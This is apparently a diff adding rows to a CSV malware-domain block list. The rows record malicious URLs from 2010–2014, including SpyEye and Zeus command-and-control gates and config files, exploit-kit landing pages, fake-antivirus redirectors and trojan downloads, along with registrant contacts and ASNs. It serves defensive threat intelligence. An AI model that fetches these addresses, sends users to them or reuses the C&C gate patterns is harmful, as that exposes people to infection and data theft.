+"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=0","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=1","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","backdoor CycBot","abuse@dot.tk","32613","0","CA", +"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=ftpgrabber","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","malware calls home","abuse@dot.tk","32613","0","CA", +"2010/11/14_22:12","fkhfgfg.tk/123/load.php?file=pokergrabber","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","malware calls home","abuse@dot.tk","32613","0","CA", +"2010/11/15_18:18","-","92.60.177.244/out/al8.php?i=15","grusha-92-60-177-244.hostinghutor.com.","trojan downloader","-","15772","0","UA", +"2010/11/15_18:37","-","89.209.91.49/e/bin/config.bin","stream-91.49.users.odessa.comstar.net.ua.","Spyeye config file","-","8359","0","UA", +"2010/11/15_18:37","-","89.209.91.49/e/bt_version_checker.php","stream-91.49.users.odessa.comstar.net.ua.","SpyEye C&C","-","8359","0","UA", +"2010/11/15_18:37","-","78.26.187.39/god/jwi.php?i=15","vps70-16.elaninet.com.","fake av","-","34187","0","UA", +"2010/11/16_18:59","-","91.217.162.176/dm3.exe","-","trojan TDSS","-","51441","0","UA", +"2010/11/16_18:59","web-domain.tk/go/?afid=51","209.172.59.196","ip-209-172-59-196.static.privatedns.com.","fake av","abuse@dot.tk","32613","0","CA", +"2010/11/18_20:56","-","91.217.249.136/jwb.php?i=15","-","trojan Bredolab","-","51554","0","UA", +"2010/11/18_20:56","unlim-app.tk/go/?afid=51","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/18_21:14","-","200.63.44.192/hk/show.php?key=27b7d8fb16d42bb82f9cf3a156f77994&u=user123","-","exploit kit","-","27716","0","PA", +"2010/11/18_21:14","-","200.63.44.192/hk/show.php?key=27b7d8fb16d42bb82f9cf3a156f77994&u=user123","-","trojan","-","27716","0","PA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/config.bin","-","SpyEye config file","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/k.exe","-","trojan SpyEye","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/load.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/45.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/baby.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v1crypted.exe","-","-","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v1crypted1.exe","-","-","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v2crypted.exe","-","trojan","-","41665","0","UA", +"2010/11/19_12:41","-","213.155.12.144/sec/bin/upload/v2crypted1.exe","-","trojan","-","41665","0","UA", +"2010/11/19_19:45","-","109.196.143.136/aff422_flsgejrlhjtrag.exe","-","trojan","-","39150","0","UA", +"2010/11/19_19:45","-","109.196.143.137/setup.exe","-","trojan","-","39150","0","UA", +"2010/11/19_19:45","-","78.26.187.41/god/bp.php?i=15","vps70-6.elaninet.com.","trojan downloader","-","34187","0","UA", +"2010/11/19_19:45","-","92.60.177.246/other/cu.php?i=15","grusha-92-60-177-246.hostinghutor.com.","trojan","-","15772","0","UA", +"2010/11/20_07:03","-","114.203.87.195/help.asp","-","exploit","-","9318","0","KR", +"2010/11/20_07:03","-","121.254.145.212/w3c/ad.exe","-","trojan","-","3786","0","KR", +"2010/11/20_09:49","-","204.45.48.15/shop/xsf.php?i=15","actualemailsavings.info.","fake av","-","30058","0","US", +"2010/11/21_11:02","-","128.134.30.87/w.exe","-","trojan","-","4766","0","KR", +"2010/11/21_11:02","-","128.134.30.87/s.exe","-","trojan","-","4766","0","KR", +"2010/11/21_16:10","new-address.tk/go/?afid=80","217.119.57.22","bvtk02.synserver.de.","fake av","abuse@dot.tk","31100","0","DE", +"2010/11/21_16:10","-","92.60.177.236/old/jzc.php?i=15","grusha-92-60-177-236.hostinghutor.com.","trojan","-","15772","0","UA", +"2010/11/22_07:25","-","91.217.162.158/pic/is.php?i=15","-","trojan downloader","-","51441","0","UA", +"2010/11/22_12:30","-","195.226.197.51/my_spl4/xt.php?i=15","-","trojan","-","51303","0","UA", +"2010/11/24_19:20","-","80.24.67.44/images/install_flash_player.exe","44.Red-80-24-67.staticIP.rima-tde.net.","trojan","-","3352","0","ES", +"2010/11/26_17:33","www.gameangel.com/System/html/js/html.js","121.156.126.10","-","iframe directs to exploit","HumanWorks / Minkyu Park park@minkyu.com","4766","0","KR", +"2010/11/26_19:18","-","69.50.208.164/stat/co.php?i=15","-","fake av","-","18866","0","US", +"2010/11/26_20:26","-","195.226.197.51/my_spl3/dzf.php?i=15","-","trojan","-","51303","0","UA", +"2010/11/26_20:26","-","69.50.195.232/","-","Bleeding Life exploit kit","-","18866","0","US", +"2010/11/26_21:56","-","91.207.182.55/xxx1/gw.php?i=15","-","trojan SpyEye","-","48280","0","UA", +"2010/12/02_17:39","-","109.196.143.136/setup.exe","-","fake av","-","39150","0","UA", +"2010/12/02_17:39","-","109.196.143.136/vlx777_sdhgjklaogreah.exe","-","trojan","-","39150","0","UA", +"2010/12/02_18:42","-","91.213.174.46/KillEXE.exe","-","trojan","-","29106","0","UA", +"2010/12/02_18:42","-","91.213.174.46/all-zahlung.exe","-","trojan Ramnit","-","29106","0","UA", +"2010/12/02_20:17","-","220.110.138.52/MNRSys/images/install_flash_player.exe","52.48.138.110.220.in-addr.arpa.","trojan","-","4713","0","JP", +"2010/12/03_17:29","-","201.76.178.58/.YAMAHA/kx.gif","mvx-201-76-178-58.mundivox.com.","trojan Banker","-","17222","0","BR", +"2010/12/03_17:29","-","201.76.178.58/.YAMAHA/sx.gif","mvx-201-76-178-58.mundivox.com.","trojan Banker","-","17222","0","BR", +"2010/12/03_17:29","-","201.76.178.58/.YAMAHA/24.gif","mvx-201-76-178-58.mundivox.com.","trojan Banker","-","17222","0","BR", +"2010/12/03_18:04","-","203.157.204.2/icons/facebook_toolbar.exe","-","irc backdoor","-","9649","0","TH", +"2010/12/08_13:37","vvps.ws/44/mothersdarlingcross.php?","91.200.240.46","-","trojan","contact@privacyprotect.org","48709","0","UA", +"2010/12/08_20:40","-","91.217.162.228/pic/cq.php?i=15","-","trojan downloader","-","51441","0","UA", +"2010/12/12_20:02","-","91.207.182.56/xxx1/gw.php?i=15","-","trojan SpyEye","-","48280","0","UA", +"2010/12/12_23:48","-","109.196.143.136/andru333_lfdshogerhah.exe","-","trojan","-","39150","0","UA", +"2010/12/12_23:48","-","109.196.143.137/setup.exe","-","trojan","-","39150","0","UA", +"2010/12/15_19:15","-","189.108.44.42/envc.php?praquem=dianalnogueira@gmail.com&titulo=Empresas%20000000-C9913A97%2011:11:47&texto=Sony%20Samsung%20Philipis%20Gradiente%20MMX%20EBX%20Toyota%20Volks%20BMW%20Mercedez%20Fiat","mail.lavapes.com.br.","maklware calls home","-","10429","0","BR", +"2010/12/15_19:15","-","222.24.94.19/default/index/images/manual/oracle.txt","-","Windows hosts file used by banking trojan","-","4538","0","CN", +"2010/12/15_19:15","-","202.38.97.217/manual/readme.txt","-","Windows hosts file used by banking trojan","-","4538","0","CN", +"2010/12/15_21:06","-","91.213.174.44/KillEXE.exe","-","trojan","-","29106","0","UA", +"2010/12/16_17:28","-","98.158.178.231/pics.scr","whm.profissionalizando.org.","backdoor","-","32780","0","US", +"2010/12/16_19:46","-","91.213.174.10/KillEXE.exe","-","trojan Banker","-","29106","0","UA", +"2010/12/16_19:46","-","69.197.135.51/ins/gts/xw.php?i=15","-","trojan","-","32097","0","US", +"2010/12/18_20:26","-","211.234.117.132/index.htm","-","IE exploit","-","3786","0","KR", +"2010/12/19_16:35","-","195.234.124.40/kor/du.php?i=15","-","trojan","-","20489","0","UA", +"2010/12/21_06:50","-","91.213.217.91/index.php?9t=w3N0U4cAIZamABawd7aWMGAE56&4TBG=28CPTYS8X181QOG5P6PTtO&80Il=WdbMk8vV24%2FPiw7&009jY=2V3N01&00=ATK2HJ1U73F8&8Ad03=MCoqPV&7AQe=OBVYMUtDK&0Cj9=VZPPUSVI5ZR9DI77X&46l5k=Q0E6IYM722K66&H7W=SgdOCT9iMD9gDmpSCF&h6=zBHtRBCprYmlnamd9BGJkTSE6Qw%3D%3D&MYyjG=JmfSNUZFJtelNxLwFm&O1u5v=VgclWgU","-","fake scanner page","-","49806","0","UA", +"2010/12/21_21:00","-","91.217.162.239/shikel/dz2.php?i=15","-","trojan","-","51441","0","UA", +"2010/12/21_21:00","-","69.50.209.109/stat/bv.php?i=15","-","trojan","-","18866","0","US", +"2010/12/25_13:35","-","116.255.180.231/smc/bue.php?i=15","-","trojan","-","4837","0","CN", +"2010/12/25_13:35","-","69.64.63.204/hqi.php?i=15","balder038.server4you.net.","trojan","-","30083","0","US", +"2010/12/25_13:57","-","173.244.194.236/goi.php?i=15","173.244.194.236.static.midphase.com.","trojan","-","36351","0","US", +"2010/12/26_10:17","-","211.234.117.47/index.htm","-","IE exploit","-","3786","0","KR", +"2010/12/26_11:57","-","67.21.76.6/zhk.htm","-","IE exploit","-","46844","0","US", +"2010/12/26_11:57","-","67.21.76.6/zfc.htm","-","IE exploit","-","46844","0","US", +"2010/12/27_17:18","-","193.107.172.11/abr.v.alg/gate.php?guid=User!SANDBOX2!D06F0742&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=4C78BF5E&md5=dbe81c844053e377da221d2d0bdb34d4","-","SpyEye C&C","-","196957","0","UA", +"2010/12/27_17:18","-","193.107.172.11/abr.v.alg/bin/config.bin","-","SpyEye config file","-","196957","0","UA", +"2010/12/27_17:55","-","91.207.182.56/xxx2/kt.php?i=15","-","fake av","-","48280","0","UA", +"2010/12/27_19:51","-","91.217.162.199/images/hni.php?i=15","-","trojan","-","51441","0","UA", +"2010/12/27_23:22","-","69.50.202.16/stop/xsd.php?i=15","-","trojan","-","18866","0","US", +"2010/12/28_18:17","-","116.255.180.231/elt/e/index.php","-","Eleonore Exploits pack v1.4.4mod","-","4837","0","CN", +"2010/12/28_18:17","-","116.255.180.231/elt/e/stat.php","-","control panel of Eleonore Exploits pack v1.4.4mod","-","4837","0","CN", +"2010/12/28_23:01","-","61.57.227.5/js/b1.asp","upgroup.piinet.net.","IE exploit","-","17710","0","TW", +"2010/12/28_23:01","-","61.57.227.5/js/b3.asp","upgroup.piinet.net.","IE exploit","-","17710","0","TW", +"2010/12/29_19:10","-","195.234.124.41/kor/du.php?i=15","-","trojan","-","20489","0","UA", +"2010/12/31_19:40","-","74.81.73.134:9082/exemple.com/index.php","gnax-ded100.simplehelix.com.","Eleonore exploit pack","-","16626","0","US", +"2010/12/31_19:40","-","74.81.73.134:9082/exemple.com/load.php?spl=javas","gnax-ded100.simplehelix.com.","trojan","-","16626","0","US", +"2010/12/31_23:36","-","125.141.196.59/A.asp","-","IE exploit","-","4766","0","KR", +"2011/01/03_17:34","beldiplomcom.75.com1.ru/true.php","89.108.66.188","cp60.agava.net.","exploit kit","domains@agava.com","43146","0","RU", +"2011/01/03_17:34","beldiplomcom.75.com1.ru/loading.php?spl=mdac","89.108.66.188","cp60.agava.net.","trojan FireThief","domains@agava.com","43146","0","RU", +"2011/01/08_17:42","-","173.192.136.92/sdh.htm","173.192.136.92-static.reverse.softlayer.com.","exploit","-","36351","0","US", +"2011/01/08_17:42","-","173.192.136.92/tow.htm","173.192.136.92-static.reverse.softlayer.com.","exploit","-","36351","0","US", +"2011/01/10_20:06","url-cameralist.tk/go/?afid=136","206.217.137.210","mail.ogairealeyes.com.","fake av","abuse@dot.tk","36352","0","US", +"2011/01/10_20:06","-","208.76.54.216/shop/gva.php?i=2","-","fake av","-","47869","0","US", +"2011/01/11_19:16","-","71.7.3.60/webctrl_client/1_0/TreeImages/rtl/l1.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan","-","30160","0","US", +"2011/01/11_19:16","-","71.7.3.60/webctrl_client/1_0/TreeImages/rtl/l2.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan","-","30160","0","US", +"2011/01/11_19:16","-","71.7.3.60/webctrl_client/1_0/TreeImages/rtl/l3.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan","-","30160","0","US", +"2011/01/12_14:33","-","220.128.152.141/aspnet_client/system_web/1_1_4322/flash.htm","220-128-152-141.HINET-IP.hinet.net.","leads to trojan Banker","-","3462","0","TW", +"2011/01/12_19:15","-","209.216.193.107/registrydoktor-newde.php","www.antivirus-reports.org.","fake av","-","21607","0","US", +"2011/01/14_18:43","-","89.187.50.195/index.php?3104c3a31c438f61b5e85b6b6c751c0e","-","exploit kit","-","25129","0","MD", +"2011/01/14_18:43","-","89.187.50.195/server_privileges.php?03b32fe00ceb95f0a9fc8dd78a0d58d1=3","-","trojan","-","25129","0","MD", +"2011/01/17_10:30","-","110.45.136.181/stat/x.asp","-","IE exploit","-","3786","0","KR", +"2011/01/20_11:16","-","71.7.3.60/webctrl_client/a/xp001.gif","grnl-static-04-0012.dsl.iowatelecom.net.","trojan Banker","-","30160","0","US", +"2011/01/21_20:32","-","173.244.192.245/zfotp.htm","173.244.192.245.static.midphase.com.","IE exploit","-","36351","0","US", +"2011/01/23_20:06","site-checksite.tk/go/?afid=144","74.63.76.18","pc1.regionaladnetwork.com.","fake av","abuse@dot.tk","30058","0","US", +"2011/01/25_18:09","www.downloaddirect.com/software/vlc-player/2567","67.55.67.250","welcome23.webcamclub.com.","trojan","Design and Marketing DM S.A. / juancarlos@loudmo.com","27257","0","US", +"2011/01/26_19:40","-","194.247.58.96/soln_1/knb.php?i=2","vpn10-dip-t-pool2-194-247-58.96.sevpn.com.","trojan SpyEye","-","52093","0","UA", +"2011/01/26_19:40","-","194.247.58.95/mypanel/gate.php?guid=5.1.2600!SANDBOX0!D06F0742&ver=10305&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=169E4359&md5=72079beedbc873cb73e7326ef3f8de56&plg=customconnector;webfakes;socks5;ftpbc;ccgrabber&stat=online","vpn10-dip-t-pool2-194-247-58.95.sevpn.com.","SpyEye C&C","-","52093","0","UA", +"2011/01/30_20:52","-","95.169.186.126/wp-logs/cm.php?i=15","ns.km33904.keymachine.de.","trojan downloader","-","31103","0","DE", +"2011/01/30_21:40","-","208.76.54.224/shop/jp.php?i=15","-","fake av","-","47869","0","US", +"2011/02/01_08:21","-","67.21.76.33/fvp.htm","-","IE exploit","-","46844","0","US", +"2011/02/01_08:21","-","67.21.76.33/rcf.htm","-","IE exploit","-","46844","0","US", +"2011/02/01_17:30","-","186.202.16.186/winjar2011.dll","cpro0867.publiccloud.com.br.","trojan Bancos","-","27715","0","BR", +"2011/02/02_13:30","-","195.242.182.30/xxx1/xob.php?i=15","-","trojan","-","44994","0","EU", +"2011/02/02_18:13","www.kcta.or.kr/js/json.js","210.109.97.193","193.0-255.97.109.210.in-addr.arpa.","obfuscated iframe leads to exploit","-","9848","0","KR", +"2011/02/02_18:13","www.spris.com/images/log.txt","210.114.221.53","-","IE exploit","spris corp. / koo bonghoe wkpark@kumkang.com","4670","0","KR", +"2011/02/03_10:51","-","46.17.101.2/main/gate.php","-","SpyEye C&C","-","48211","0","RU", +"2011/02/05_17:53","-","91.200.240.7/Yh89RfaPh7bBss1zOFn7saOaOOa/bin/config.bin","-","SpyEye config file","-","48709","0","UA", +"2011/02/05_17:53","-","91.200.240.7/Yh89RfaPh7bBss1zOFn7saOaOOa/gate.php","-","SpyEye C&C","-","48709","0","UA", +"2011/02/05_20:56","orkut.krovatka.su/imagem-542454.jpg","194.186.88.38","ftp.krovatka.su.","trojan Banker","domain@hc.ru","3216","0","RU", +"2011/02/08_20:17","-","195.80.151.59/7box/dqj.php?i=15","-","trojan Bamital","-","50877","0","DE", +"2011/02/10_08:05","faq-candrive.tk/go/?afid=51","206.217.131.101","host.colocrossing.com.","fake av","abuse@dot.tk","36352","0","US", +"2011/02/12_09:57","-","194.247.58.51/ir7.php?i=15","vpn6-dip-t-pool2-194-247-58.51.sevpn.com.","trojan SpyEye","-","52093","0","UA", +"2011/02/12_09:57","hosting-controlnext.tk/go/?afid=51","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/12_09:57","hosting-controlid1.tk/go/?afid=156","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/13_10:45","hosting-controlid1.tk/go/?afid=90","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/13_22:04","hosting-controlpin.tk/go/?afid=51","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/13_22:50","hosting-controlpr.tk/go/?afid=51","41.223.53.147","host-41.223.53.147.citynet.com.eg.","fake av","abuse@dot.tk","33785","0","EG", +"2011/02/18_18:03","bookofkisl.com/album.php","67.195.145.141","p8p-a.geo.vip.sp1.yahoo.com.","irc backdoor","Eliot Petersn / contact@myprivateregistration.com","36752","0","US", +"2011/02/18_20:25","-","91.200.240.7/T6yRslk8JrR5sOpskHs51L/bin/config.bin","-","SpyEye config file","-","48709","0","UA", +"2011/02/18_20:25","-","91.200.240.7/T6yRslk8JrR5sOpskHs51L/gate.php","-","SpyEye C&C","-","48709","0","UA", +"2011/02/19_16:50","infoweb-coolinfo.tk/90/?afid=90","46.21.169.41","-","fake av","abuse@dot.tk","42755","0","NL", +"2011/02/20_10:48","alissonluis-musico.sites.uol.com.br/mar.jpg","200.147.33.21","200-147-33-21.static.uol.com.br.","trojan Banker","Contato Administrativo - UOL / l-registrobr-uol@corp.uol.com.br","7162","0","BR", +"2011/02/20_11:07","-","194.247.58.174/js/config.bin","vpn18-dip-t-pool29-194-247-58.174.sevpn.com.","SpyEye config file","-","52093","0","UA", +"2011/02/21_08:18","-","91.200.240.7/T6yRslk8JrR5sOpskHs51L/bin/config.bin","-","SpyEye C&C","-","48709","0","UA", +"2011/02/22_20:34","-","71.235.85.177/images/xc.gif","c-71-235-85-177.hsd1.ct.comcast.net.","trojan Banload","-","7015","0","US", +"2011/02/22_20:34","-","200.13.244.245/cw-assenda/bin/es/es/post.asp","static-epm200-13-244-245.epm.net.co.","malware calls home","-","13489","0","CO", +"2011/02/22_20:34","-","200.13.244.245/cw-assenda/bin/es/es/contador.asp","static-epm200-13-244-245.epm.net.co.","infection counter","-","13489","0","CO", +"2011/02/24_21:26","skiholidays4beginners.com/subtraction-scorpio-male-and-virgo-female-compatiblity/","67.215.248.8","-","Compromised site leading to fake AV","Alan Garcia / domainadmin@freeola.co.uk","29761","0","US", +"2011/02/24_21:26","patrickhickey.eu/concertina-free-short-skits-scripts-in-hindi-for-independence-day/","89.234.64.136","web4.hosting.digiweb.ie.","Compromised site leading to fake AV","NOT DISCLOSED! / domains@europeregistry.com","31122","0","IE", +"2011/02/24_21:26","rolemodelstreetteam.invasioncrew.com/raazuc/Dossier-For-M","98.131.132.1","rev.opentransfer.com.1.132.131.98.in-addr.arpa.","Compromised site leading to fake AV","Invasion Crew / sandy@invasioncrew.com","32392","0","US", +"2011/02/24_21:26","hy-brasil.mhwang.com/","212.117.169.139","ip-212-117-169-139.server.lu.","Compromised site leading to fake AV","info@achievement.com.sg","5577","0","LU", +"2011/02/24_21:26","marx-brothers.mhwang.com/","212.117.169.139","ip-212-117-169-139.server.lu.","Compromised site leading to fake AV","info@achievement.com.sg","5577","0","LU", +"2011/02/24_21:26","networkmedical.com.hk/defeating-innova-champion-discs-inc-raven/","66.7.213.86","queen.host-care.com.","Compromised site leading to fake AV","alfredau0310@hotmail.com","33182","0","US", +"2011/02/24_21:30","wallpapers91.com","67.23.129.220","-","Exploit","Indjijacafe / Indjijacafe vujo91@gmail.com","12053","0","CA", +"2011/02/25_16:20","rat-on-subway.mhwang.com/","212.117.169.139","ip-212-117-169-139.server.lu.","Compromised site leading to fake AV","info@achievement.com.sg","5577","0","LU", +"2011/02/25_16:20","www.dowdenphotography.com/ps/wy-template-printable-brain-cap-teaching-anatomy.htm","74.53.86.114","gator518.hostgator.com.","Compromised site leading to fake AV","HostGator / support@hostgator.com","21844","0","US", +"2011/03/11_15:52","-","174.127.70.195/8545/4544/","174.127.70.195.static.midphase.com.","fake AV","-","36351","0","US", +"2011/03/12_14:57","seet10.jino.ru","81.177.139.113","srv16-h-st.jino.ru.","Trojan","info@avguro.ru","8342","0","RU", +"2011/03/12_14:57","vkont.bos.ru","194.186.208.8","as3.centre.ru.","Trojan","web@centre.ru","3216","0","RU", +"2011/03/13_21:47","download207.mediafire.com/2ezaemp68lyg/fe8lc6kqa1f06n1/Grand+Theft+Modification.zip","38.114.196.226","-","trojan","RE> / PRE>","46179","0","US", +"2011/03/18_19:29","-","69.50.192.250:8000","-","malware calls home","-","18866","0","US", +"2014/01/06_12:28","dl.downf468.com/n/3.0.25/3299664/manual-básico-de-windows-movie-maker.exe","204.93.38.152","-","Win32/FirseriaInstaller.C","-","20940","0","US", +"2011/03/20_17:23","-","70.38.124.97/distrmaincp/","-","SpyEye C&C","-","32613","0","CA", +"2011/03/20_17:23","-","91.220.62.84/123/index.php","-","Eleonore Exploits pack version 1.4.4mod","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/123/stat.php","-","control panel of Eleonore Exploits pack version 1.4.4mod","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/123/load.php?spl=mdac","-","trojan downloader","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/info/load.php?file=0","-","backdoor Cycbot","-","51699","0","UA", +"2011/03/20_17:23","-","91.220.62.84/info/load.php?file=1","-","fake av","-","51699","0","UA", +"2011/03/22_19:21","-","70.43.40.116/PRISM/CSS/a.gif","70.43.40.116.nw.nuvox.net.","trojan Banload","-","11456","0","US", +"2011/03/22_19:21","-","70.43.40.116/PRISM/CSS/b.gif","70.43.40.116.nw.nuvox.net.","trojan","-","11456","0","US", +"2011/03/22_19:21","-","70.43.40.116/PRISM/CSS/c.gif","70.43.40.116.nw.nuvox.net.","trojan","-","11456","0","US", +"2011/03/26_16:01","-","95.64.8.76/hex/jwh.php?i=15","-","fake av","-","49873","0","RO", +"2011/04/01_04:46","www.widestep.com/files/ws_qk_install.exe","205.186.183.224","ekiaioocks.gs07.gridserver.com.","Win32/Agent.HSDNOGR","widestep@mail.ru","31815","0","US", +"2011/05/30_10:22","www.casamama.nl/","109.72.86.5","nl05.pcextreme.nl.","obfuscated iframe on compromised site leads to exploit kit","-","48635","0","NL", +"2011/07/04_19:06","-","186.190.213.10/dl/","wan18.b2bprovidersite.com.","trojan","-","52302","0","PA", +"2011/07/09_02:48","-","186.190.213.10/x/","wan18.b2bprovidersite.com.","Trojan.FakeAV","-","52302","0","PA", +"2011/07/14_05:52","-","79.142.65.179/crack-keygen/592147/emu8086-300.html","hosted-by.altushost.com.","Leads to Renos trojan","-","49544","0","EU", +"2011/07/14_05:52","-","79.142.65.179/crack-keygen/223644/wavclean-183.html","hosted-by.altushost.com.","Leads to Renos trojan","-","49544","0","EU", +"2011/07/14_05:52","-","79.142.65.179/crack-keygen/390415/pdf-snake-v237-for-adobe-acrobat.html","hosted-by.altushost.com.","Leads to Renos trojan","-","49544","0","EU", +"2011/07/21_15:16","-","77.221.149.219/get/311/23639","77.221.149.219.addr.datapoint.ru.","Fraud Skype setup","-","30968","0","RU", +"2011/07/26_18:33","-","46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot","-","trojan","-","51632","0","UA", +"2011/07/28_01:54","seoholding.com/13/overblog","80.91.176.192","ds2.hosted.in.","Redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/07/28_01:54","seonetwizard.com/in.cgi?3","80.91.176.192","ds2.hosted.in.","Redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/07/29_23:50","seoholding.com/13/overblog&usg=AFQjCNGS7Xe0yilVQ6lGj3Oroonf7-gfhg","80.91.176.192","ds2.hosted.in.","Redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/07/30_20:33","-","46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=odayz&","-","trojan","-","51632","0","UA", +"2011/07/31_19:47","www.makohela.tk/kingofthelamers.jar","72.20.53.34","server9020.alkareklam.com.","java exploit","E-mail: domain@isimtescil.net","25761","0","US", +"2011/08/17_23:29","crackzone.net/data/Super_Mp3_Download_Version_3.3.4.6_serial_keys_gen-bee3afe71a.html","188.95.53.17","-","Rootkit.0Access","Private Whois crackzone.net h875b0j4d9500ec582d0@oqjij874d9300d54bd95.privatewhois.net","57172","0","EU", +"2011/08/31_21:38","seoholding.com/13/boardhost","80.91.176.192","ds2.hosted.in.","redirects to trojan","Dmitry Klimov win32parit.b@gmail.com","21219","0","UA", +"2011/09/12_18:49","www.infra.by/conflq.php","91.149.157.133","vh16.hoster.by.","obfuscated iframe leads to exploit kit","-","6697","0","BY", +"2011/09/18_15:59","elocumjobs.com/_sql/1/index.php?spl=mdac","78.136.20.106","132775-www1.ecarers.com.","fake av","Balfor Recruitment Group Ltd (BALFO04979) / domain-admin@easily.co.uk","15395","0","GB", +"2011/10/21_23:55","-","121.10.107.78:88/b7/0.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/1.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/3.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/4.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/5.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/6.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/7.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/8.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/9.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/10.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/11.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/10/21_23:55","-","121.10.107.78:88/b7/13.exe","-","trojan OnlineGames","-","4134","0","CN", +"2011/11/10_21:52","-","202.157.165.152/zfin.html","-","redirects to exploit kit","-","9892","0","SG", +"2011/11/16_18:14","nobodyspeakstruth.narod.ru/upload/main.exe","87.250.250.83","wrz.yandex.ru.","trojan","-","13238","0","RU", +"2014/03/23_10:15","aintdoinshit.com/","74.220.207.85","host85.hostmonster.com.","Backdoor.IRCBot","Registrar Abuse Contact support@hostmonster.com","46606","0","US", +"2012/02/26_21:35","cswilliamsburg.com/site7/data/","174.122.148.94","5e.94.7aae.static.theplanet.com.","CrimePack exploit kit","Michael Basford / -","21844","0","US", +"2012/03/17_20:32","-","31.186.102.170/lolomgfucku/3214spackasd324/","-","Bleeding Life exploit kit","-","49505","0","RU", +"2012/03/17_20:32","-","31.186.102.170/lolomgfucku/3214spackasd324//download_file.php?e=JavaSignedApplet","-","trojan","-","49505","0","RU", +"2012/04/01_19:58","-","178.248.85.67/zeus/config.bin","67.85.248.178.sta.211.ru.","zeus config file","-","41794","0","RU", +"2012/04/01_19:58","-","178.248.85.67/zeus/gate.php","67.85.248.178.sta.211.ru.","zeus drop zone","-","41794","0","RU", +"2012/04/02_20:11","-","193.107.19.80/inter/gate.php?hwid=4281525696&pc=COMPUTERNAME&localip=127.0.0.1&winver=x32","-","malware calls home","-","197794","0","RU", +"2012/04/05_08:08","-","211.44.250.173:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","9318","0","KR", +"2012/04/05_08:08","-","180.235.150.72:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","45731","0","ID", +"2012/04/08_09:23","-","188.127.249.241/~alert/alert.php?id=5","-","Message text for Ransom","-","48172","0","RU", +"2012/04/09_12:25","-","112.78.124.115:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","9371","0","JP", +"2012/04/10_08:31","-","88.190.22.72:8080/navigator/jueoaritjuir.php","sd-29537.dedibox.fr.","Phoenix exploit kit","-","12322","0","FR", +"2012/04/10_08:31","-","89.31.145.154:8080/navigator/jueoaritjuir.php","vserver-mpfppr2.nexen.net.","Phoenix exploit kit","-","41628","0","FR", +"2012/04/10_08:31","-","62.85.27.129:8080/navigator/jueoaritjuir.php","sw-gbit-1.gw.27-129.ime.lv.","Phoenix exploit kit","-","39201","0","LV", +"2012/04/10_08:31","-","219.94.194.138:8080/navigator/jueoaritjuir.php","-","Phoenix exploit kit","-","9371","0","JP", +"2012/04/11_20:36","-","62.109.29.101/a/xwy.php?i=15","geovanne.fvds.ru.","Zeus trojan","-","29182","0","LU", +"2012/04/12_15:12","-","69.194.192.229/q.php?f=7245d&e=2","-","Zeus trojan","-","14670","0","US", +"2012/04/12_20:21","-","91.195.254.71/?a8b15ffc5b06664b1e119cc1c6942b3d","-","trojan Ransom message text","-","43997","0","RU", 